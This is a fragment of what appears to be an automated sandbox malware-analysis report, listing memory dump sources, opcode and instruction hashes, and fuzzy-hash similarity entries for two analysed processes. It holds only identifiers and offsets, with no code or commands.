                                                                                                                                                                                                                                            • Opcode ID: d42720fd98c0fc10a74ae955e542b21be177ad9979ca66a9446dd3e2baabe716
                                                                                                                                                                                                                                            • Instruction ID: 03e3c694c380676df6993937ec861ce4456c6eda7aa39f1ff3ddcb34cc9c4c09
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d42720fd98c0fc10a74ae955e542b21be177ad9979ca66a9446dd3e2baabe716
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF110871E3CD590FF799B33864252B826C1EFA9791F8401BAC409C72C2DF1D6C820399
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: cd9f34405873ed2db351378acdaa4fd68f7340f5ab7db0ee02955105a3eca4fe
                                                                                                                                                                                                                                            • Instruction ID: ac73a400ab8eb2c26851d38cd51b9f13fd85f23d6dad84c7f75004af6ff52edb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd9f34405873ed2db351378acdaa4fd68f7340f5ab7db0ee02955105a3eca4fe
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0881F322E1F15B2AE71037FC34261FE2F70DF412A9F480272E08C8E5C7DE1E684542AA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 545f7c1a829e3e549de865acf4fce75aae16e1c13b409d19464dc12e5343ee26
                                                                                                                                                                                                                                            • Instruction ID: add44bb52407eb447b319382475be61e64ed67892ade00de67cae80082d48c59
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 545f7c1a829e3e549de865acf4fce75aae16e1c13b409d19464dc12e5343ee26
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26711512E1F1572AE71037FC34261FE2F71DF802A9F884272F18C8A5C7DE1E684542A9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.2191592140.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff848f20000_6z9uno0baqvej0me.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2a1e9dc946702bf2f304bc74bdbb93c34d1eb815b92131e26403b6e5af209e62
                                                                                                                                                                                                                                            • Instruction ID: 50e6e9ed07e4d47cd01aad64c715f002dfbe1ec26e32492a5cce48953da0dbf3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a1e9dc946702bf2f304bc74bdbb93c34d1eb815b92131e26403b6e5af209e62
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C331B72771B669DBD341BBBCB8510EA7770EF42279B084377D188CE053CE1D504A87AA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2c1017387854f0a3be28a2928313b7c9a6fea155375b33b2c538924bf7a18924
                                                                                                                                                                                                                                            • Instruction ID: 5a8b4d86c62ba5a438702f9c566c2cf3034d9960c8a278a0ad3e436a5083bb90
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2c1017387854f0a3be28a2928313b7c9a6fea155375b33b2c538924bf7a18924
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5682A130E2D6870FEB57B33498251763FA19F56291F8504B7C489C71D3EF1C690A93AA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 98c8891d964f9a8f49903c0b1a17ed0611cf477f2f9acd90b6066f450649f7d9
                                                                                                                                                                                                                                            • Instruction ID: 4a62510a6dd5ff8a767c5202b8cae30f0fe21a035ec4c996ad3e17f3058f05f3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 98c8891d964f9a8f49903c0b1a17ed0611cf477f2f9acd90b6066f450649f7d9
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F1A43090CA8D8FEBA8EF28C8557E937E1FF54350F04426EE84DC7295DB3899558B86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: befd57e156e93d98b7ce4977977b7ebfce9e62083184155a75c8e4f68f9e6bf1
                                                                                                                                                                                                                                            • Instruction ID: b1618ccde936f5c628719a68346cc286e6ca292c808778d09ac7bf1e0fcac238
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: befd57e156e93d98b7ce4977977b7ebfce9e62083184155a75c8e4f68f9e6bf1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B5E1B23090CA8E8FEBA8EF28C8557E937D1FF54350F14426EE84DC7295DB78A9458B81
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 67bc8f4f48ab38aa91ef17ffc416d8d4f33cc1e72ad207756f5e84dc1adb4e8e
                                                                                                                                                                                                                                            • Instruction ID: e14e4b80aaee5cd2446cc77fa112576e99f917e4907b300a791ccdd67d182441
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67bc8f4f48ab38aa91ef17ffc416d8d4f33cc1e72ad207756f5e84dc1adb4e8e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB614931E3C0130DFBBEB378C8061BA71429B61396F91267BD54CC24D1AF2DB89A6199
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: `KH$#CM_^
                                                                                                                                                                                                                                            • API String ID: 0-1048266845
                                                                                                                                                                                                                                            • Opcode ID: 42000c05ff815ea9ea0323eb339a31d84be1d5f7814319bfa906c6571ff40a91
                                                                                                                                                                                                                                            • Instruction ID: c62b7ec8c6cd277986e4d29de080634868d42bb2f4de870fd60052edb961a736
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 42000c05ff815ea9ea0323eb339a31d84be1d5f7814319bfa906c6571ff40a91
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CC19E30A1D91A8FEA89F76894517BAB3E2FF98340F64057AE40DC32D2DF2CB8418755
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ;L_^
                                                                                                                                                                                                                                            • API String ID: 0-3458132336
                                                                                                                                                                                                                                            • Opcode ID: fb617643f2b2bfad5b5d0ed9c44f156d6a5413e19e5e551febde367704b3148d
                                                                                                                                                                                                                                            • Instruction ID: 1f0e3c1edb17e415e6e9e8f63ac196f205ba1954bd0be8ff5955e8583c9f8432
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb617643f2b2bfad5b5d0ed9c44f156d6a5413e19e5e551febde367704b3148d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB510632E1DD5A5EE798FB2CA4450F977D1EFA4B50F04027AD40DE72D7DE28A8468284
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ?L_^
                                                                                                                                                                                                                                            • API String ID: 0-1098677799
                                                                                                                                                                                                                                            • Opcode ID: 364b9ba75d423c0d10a3d42e8a8ab51b4fa6ff5d7b8f71a06304ca99f84a5a3f
                                                                                                                                                                                                                                            • Instruction ID: 915329a70229badea051306c216b958946c38fdb0a197a047753810ee5f398a2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 364b9ba75d423c0d10a3d42e8a8ab51b4fa6ff5d7b8f71a06304ca99f84a5a3f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF11E53191E6CA5FE792776868210E63FB0EF97658F0901F7D48CCA0E3DA0C18568366
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9417b9bd0f7e678cf68172eca3d40c76be444bb46ec7d555f9ec46bb6db87587
                                                                                                                                                                                                                                            • Instruction ID: ae0791be51fc33e59fcb5ee5838a7beb50a2854185eb30314464a3abc8810abf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9417b9bd0f7e678cf68172eca3d40c76be444bb46ec7d555f9ec46bb6db87587
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D1B43090CA8D8FEBA8EF28C8557E977D1FF59350F04426EE84DC7291DB74A9518B82
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 3e2b870ce8b931d7989a0f08a95277f51d88420b3f3a39692554544138065704
                                                                                                                                                                                                                                            • Instruction ID: 7c4755cba22e1821d5b16f211c8a96d8520ff4244268df619d8bfae3527713da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e2b870ce8b931d7989a0f08a95277f51d88420b3f3a39692554544138065704
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 71B1B43090CA4D8FEB58EF28C8557E93BE1FF55350F04426AE84DC7292CB749945CB86
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 64f93083c699ac6b57f03966ebe62f76d4de7ad2a0f760f9d1897bd6ce61712c
                                                                                                                                                                                                                                            • Instruction ID: f865385ae806fda41fec550211e4ebddc238f5619eb8f4d2f1599581c4837ec2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64f93083c699ac6b57f03966ebe62f76d4de7ad2a0f760f9d1897bd6ce61712c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F917E31FAD90A5FF7D5A72CC85277962D2EB887A0F5902B6D40DC72D6DD2CAC828341
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8babbc4d2186dbd02086a5056425900a9036b8fab784410d5f74b1a941888791
                                                                                                                                                                                                                                            • Instruction ID: f941bb7973f1dd78a63acfaf761455089de6f59b43615cd1a2b7246536889e86
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8babbc4d2186dbd02086a5056425900a9036b8fab784410d5f74b1a941888791
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C61C730A1D9099FE784F7A888967BA77E2FF99350F14417AD00DC36D3DE2C68458B15
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 745b1d924c90a0d298aed5744dd30ce327eefd1e911f3eb6cd8ef7125d240c82
                                                                                                                                                                                                                                            • Instruction ID: a2e65068f97b7b6ce2698a0316fcb7c0878fc3d7509299f69974579815ca8205
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 745b1d924c90a0d298aed5744dd30ce327eefd1e911f3eb6cd8ef7125d240c82
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E51D931F2CA014FF25CA72CA44A67577D2EBB9B91F14417FD40DD32D2EE28AC82415A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: c5373ae25e3c7ad7efafa40006b9c483462116091c708026a7a2cbd7b7a970bf
                                                                                                                                                                                                                                            • Instruction ID: fb68f49ce60e0bc5da53e6d8c493641ac3c45656d5e3a0fb76ab9d98d862c3b9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c5373ae25e3c7ad7efafa40006b9c483462116091c708026a7a2cbd7b7a970bf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47514B31D1CA991FF359A738884A5763BD9EFA6B50F04007EE08ED31D3EE5868438366
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4e96db99df4d186578a5bca634900002f63cb346659b036ed6f8517e69c01c93
                                                                                                                                                                                                                                            • Instruction ID: cff9e9ee77d800774d004c34b6e98ada7d67bf0641cbe7a2e5057738248dcc65
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e96db99df4d186578a5bca634900002f63cb346659b036ed6f8517e69c01c93
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C51CE30D0DA9A4FE7A6B77884692B97AE1EF49250F4800BBD80DD72E3DF1C5C468356
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 2a5f4d410a29b68bba7a70608a8c1c5367a8462b2d975e7c0e031c0ab7fca892
                                                                                                                                                                                                                                            • Instruction ID: 7d779dc0d87a13f2c97914918c52dc94bfb07d5bc2834318b28bd8a5967d6d8b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a5f4d410a29b68bba7a70608a8c1c5367a8462b2d975e7c0e031c0ab7fca892
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A51D131E2DD194FEB98FB2C98896B973E1EF98751F44007AE40DD32D2DE29AC418758
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: e1fd07008d810a4a4bec0c1e32cb1dac163ebbebfdc866342f4921a90edfb794
                                                                                                                                                                                                                                            • Instruction ID: 22b65c88300f0891855d645d22d6e84f4da940b556e7073cc5adb8a1817533a7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1fd07008d810a4a4bec0c1e32cb1dac163ebbebfdc866342f4921a90edfb794
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B51CF3190CB4C8FDB19EB68D8457E9BBF1FB55310F1442AED049D7292DB74A845CB82
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bbc370413cb24a37cb847278a41b6d28f66cc8dd763925db2030da8c617d3680
                                                                                                                                                                                                                                            • Instruction ID: a89f0cc8643a5d3794c0f7d75df4898e5edf0a8e997f902a69d7e963433ed680
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bbc370413cb24a37cb847278a41b6d28f66cc8dd763925db2030da8c617d3680
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C41C131E2D9195FEB98FB2C94856B973E1EF88791F44007AE40DD32D2DE29AC418758
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 12da5153fcbe5b1ddf7d31dc64aad5b000214abed36eb48e5ff892a4d8e8a63c
                                                                                                                                                                                                                                            • Instruction ID: e3b7b9698d93bde273dc64a9278b78a4cca0b92bdbe6b1dfda5487a12eae6a0f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12da5153fcbe5b1ddf7d31dc64aad5b000214abed36eb48e5ff892a4d8e8a63c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 55518C31D1C9598FEB84FB68D4656F877E1EFA9740F0504BAD80DE72D2CB28AC018745
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 4b415388d91963c02ba8969f1201468a951a5c2469c4ea1eb3fbac85439e1800
                                                                                                                                                                                                                                            • Instruction ID: f4e980a6cd59a9c86669cf62cd1cc3b1412efe931487e025f0747ecca39e27ee
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b415388d91963c02ba8969f1201468a951a5c2469c4ea1eb3fbac85439e1800
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C41C331E2CD195FEB98FB2C98896B972E1EF98751F44007AE40DD32D2DE39AC418758
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
Memory Dump Source
• Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 6df8dcc08623566266e7393de0443483027543271ea91197b795ef3348b5d803
                                                                                                                                                                                                                                            • Instruction ID: e0bf93b818e22f72988e9b8c65f6947d48afa9de3092dad4ddbf5118f56098e1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6df8dcc08623566266e7393de0443483027543271ea91197b795ef3348b5d803
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74417031F1C91D8FEB95B72894596B836E1FFA9751F59007AD00ED32D2EF2898818705
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: f6e97c8c160e97a986960298fd51d3b720a05642ef3d7706544343735e220316
                                                                                                                                                                                                                                            • Instruction ID: 38a46ec38c968d54756cdafcbc188d7a705bf2d2f3a3034606948403e4fe4a3f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6e97c8c160e97a986960298fd51d3b720a05642ef3d7706544343735e220316
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F341B831E0C91E4FEBA5FB2894466FD77E2FF88381F4400B6D40DD32C2DA28A8428785
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff848f30000_FixerNerest.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 7056ddf87f2e97c53fec682e7f9ba4bc89bef00b9cfc8d53e008dcfbf47af93c
                                                                                                                                                                                                                                            • Instruction ID: d3d3f8d286e475dc375d1ac80ce23914311a1d88b355938c8d9112e86420fe42
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7056ddf87f2e97c53fec682e7f9ba4bc89bef00b9cfc8d53e008dcfbf47af93c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441DE72E1D88B9FF699BB3884592A8ABD1FF60780F4841B7C41CC75D2CF19AC498345
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2392450815.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
